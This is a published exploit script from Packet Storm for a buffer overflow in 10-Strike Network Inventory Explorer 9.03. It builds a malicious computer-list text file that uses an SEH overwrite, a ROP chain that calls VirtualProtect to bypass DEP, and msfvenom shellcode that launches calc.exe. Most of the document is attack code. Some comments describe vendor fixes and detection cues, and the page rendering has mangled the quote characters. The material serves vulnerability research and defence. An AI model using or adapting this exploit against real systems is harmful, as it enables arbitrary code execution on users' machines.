10-Strike Network Inventory Explorer 9.03 Buffer Overflow ≈ Packet Storm


#!/usr/bin/python

# Exploit Title: 10-Strike Network Inventory Explorer – Read-from-file Buffer Overflow (SEH)(ROP)
# Version: 9.03
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Date: 2020-03-30
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.10-strike.com
# Tested on: Win8.1 x64 – Build 9600

# Description:
# – Exploits the functionality to load a list of computers from a file
# – Some DLLs and the main EXE don't rebase, which allowed for some instruction reuse for ROP
# – Used a jump after ROP to go to a buffer for more space

# Reproduction:
# – Run the script, a TXT file will be generated
# – Open the program and click on the "Computers" tab
# – Click the "From Text File" button and select the generated TXT file
# – Click OK and check the results

# WinDBG initial crash output:
# (f54.f48): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe
# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203
# NetworkInventoryExplorer+0x2b47:
# 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (f54.f48): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
# 41414141 ?? ???

import sys, struct

# Output file name. The French-style quote characters here and throughout the
# listing are an artefact of the page rendering, not the author's source; as
# shown, the listing does not parse and is best read as documentation of the
# finding rather than as a runnable artefact.
filename = « poc_10_strike_nie.txt »

# Maximum length of the generated file; the trailing "C" filler pads up to it
maxlen = 5000

# Offsets (in bytes) into the file as measured on version 9.03 / Win8.1 x64
# (see header). They locate the SEH record relative to the start of the input
# and are presumably build-specific. The underlying defect is the unchecked
# copy of a line from the computer-list file into a stack buffer (the
# `rep movs` at the first crash in the header); bounds-checking the line
# length before that copy is the vendor-side fix.
crash_esi = 2145 # Initial space until ESI buffer filling (not referenced later in this listing)
crash_seh = 217 # Offset of the SEH handler slot
crash_nseh = crash_seh – 4 # Offset of the next-SEH pointer, immediately before the handler
landingpad = 310 # Space for RET NOP landingpad after stackpivoting

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b « x0ax0dx00x5cx3a » exitfunc=thread
# Payload size: 220 bytes
shellcode = b » »
shellcode += b »xdaxdbxd9x74x24xf4x5fx2bxc9xbdx06″
shellcode += b »xa7x5dx4bxb1x31x83xefxfcx31x6fx14″
shellcode += b »x03x6fx12x45xa8xb7xf2x0bx53x48x02″
shellcode += b »x6cxddxadx33xacxb9xa6x63x1cxc9xeb »
shellcode += b »x8fxd7x9fx1fx04x95x37x2fxadx10x6e »
shellcode += b »x1ex2ex08x52x01xacx53x87xe1x8dx9b »
shellcode += b »xdaxe0xcaxc6x17xb0x83x8dx8ax25xa0″
shellcode += b »xd8x16xcdxfaxcdx1ex32x4axefx0fxe5″
shellcode += b »xc1xb6x8fx07x06xc3x99x1fx4bxeex50″
shellcode += b »xabxbfx84x62x7dx8ex65xc8x40x3fx94″
shellcode += b »x10x84x87x47x67xfcxf4xfax70x3bx87″
shellcode += b »x20xf4xd8x2fxa2xaex04xcex67x28xce »
shellcode += b »xdcxccx3ex88xc0xd3x93xa2xfcx58x12″
shellcode += b »x65x75x1ax31xa1xdexf8x58xf0xbaxaf »
shellcode += b »x65xe2x65x0fxc0x68x8bx44x79x33xc1″
shellcode += b »x9bx0fx49xa7x9cx0fx52x97xf4x3exd9″
shellcode += b »x78x82xbex08x3dx6cx5dx99x4bx05xf8″
shellcode += b »x48xf6x48xfbxa6x34x75x78x43xc4x82″
shellcode += b »x60x26xc1xcfx26xdaxbbx40xc3xdcx68″
shellcode += b »x60xc6xbexefxf2x8ax6ex8ax72x28x6f »

# ROP chain
# ROP chain
def create_rop_chain():
# Build the DEP-bypass chain as a little-endian string of gadget addresses.
# Every address is inside MSVCR71.dll, sqlite3.dll or NetworkInventoryExplorer.exe,
# which the header says do not rebase: the hard-coded addresses only work because
# those images were shipped without ASLR (/DYNAMICBASE). Relinking them with
# /DYNAMICBASE, and replacing the legacy MSVCR71 runtime with a supported CRT,
# removes the fixed gadget sources this chain depends on.
# The chain follows the standard mona VirtualProtect pattern: it dereferences the
# VirtualProtect IAT slot (second entry), stages a size of 0x201 and a protection
# of 0x40 (PAGE_EXECUTE_READWRITE, per the NEG comments below), and the final
# PUSHAD # RETN issues the call on a stack address. A VirtualProtect call whose
# target is the calling thread's stack is the event a hooking EDR would flag here.
# rop chain generated with mona.py – www.corelan.be
rop_gadgets = [
0x7c344efe, # POP EDX # RETN [MSVCR71.dll]
0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe]
0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe]
0x61e7555f, # POP EBP # RETN [sqlite3.dll]
0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll]
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x7c34d749, # NEG EAX # RETN [MSVCR71.dll]
0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe]
0xffffffff, # -1; the INC below makes it 0, then ADD EBX,EAX copies the 0x201 from EAX
0x61e0579d, # INC EBX # RETN [sqlite3.dll]
0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe]
0x7c3458e6, # POP EDX # RETN [MSVCR71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll]
0x7c369c4a, # POP ECX # RETN [MSVCR71.dll]
0x7c38dfd7, # &Writable location [MSVCR71.dll]
0x7c34a40e, # POP EDI # RETN [MSVCR71.dll]
0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe]
0x90909090, # nop
0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe]
]
# NOTE(review): the join separator's quotes were lost in this rendering. The
# script is Python 2 (print statements below), where struct.pack returns str,
# so the result concatenates with the other str pieces of the payload.
return  ».join(struct.pack(‘<I’, _) for _ in rop_gadgets)
rop_chain = create_rop_chain()

# NOPPING
# File layout assembled below, in order:
#   [A * crash_nseh][nseh][seh][prenop][shellcode][retnop * landingpad]
#   [rop_chain][postnop][jmpback][C filler up to maxlen]
# The SEH slot receives an address inside the main EXE; that handler is only
# dispatched if the image was linked without /SAFESEH, which the crash output in
# the header (EIP = 41414141) suggests is the case for this build. /SAFESEH plus
# /DYNAMICBASE on the EXE, or SEHOP at the OS level, would each break this path.
# Nothing here touches the network: the script writes a local text file, and the
# behaviour worth monitoring is NetworkInventoryExplorer.exe spawning a child
# process (calc.exe for this PoC) after a computer list is imported.
retnop = struct.pack(« <L », 0x61e0103e) # RET # sqlite3.dll — bare RETs walk the stack while DEP is still on
prenop = « x90 » * 200 # Pre NOPs after jumping back in stack, sledding until shellcode
postnop = « x90 » * 16 # Post NOPs after running ROP chain to disable DEP

# Jump back on stack for payload space
jmpback = « xe9x9fxf9xffxff » # jmp 0xfffff9a4 # Jump back on stack for more space

# Prefix
prefix = « A » * crash_nseh # Junk until NSEH
nseh = « B » * 4 # Junk again, no use for NSEH
seh = struct.pack(« <L », 0x0101ce0b) # ADD ESP,0BDC # RETN 0x0C ** [NetworkInventoryExplorer.exe] ** # Stackpivot
suffix = prenop # Prenopping until shellcode
suffix += shellcode # Magic!
suffix += retnop * landingpad # RET NOP as a landingpad after stackpivot, still having DEP enabled
suffix += rop_chain # Disable DEP
suffix += postnop # Old school NOP-sledding
suffix += jmpback # Jump! Just like van Halen
# If the pieces already exceed maxlen the multiplier goes negative and the
# filler is silently empty; nothing checks that the file ends up maxlen long.
suffix += « C » * (maxlen – len(prefix + nseh + seh + suffix)) # Junk for filling

# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together

# NOTE(review): the bare `except:` below swallows the real IOError (permissions,
# missing directory, ...) and any other exception, printing only a generic
# message; `except IOError as e:` that reports `e`, and `with open(...)` in
# place of the manual close, would be the idiom. `file` also shadows a builtin.
try:
file = open(filename, »wb »)
file.write(payload)
file.close()
print « [+] File  » + filename +  » with size  » + str(len(payload)) +  » created successfully »
except:
print « [!] Error creating file! »
sys.exit(0)


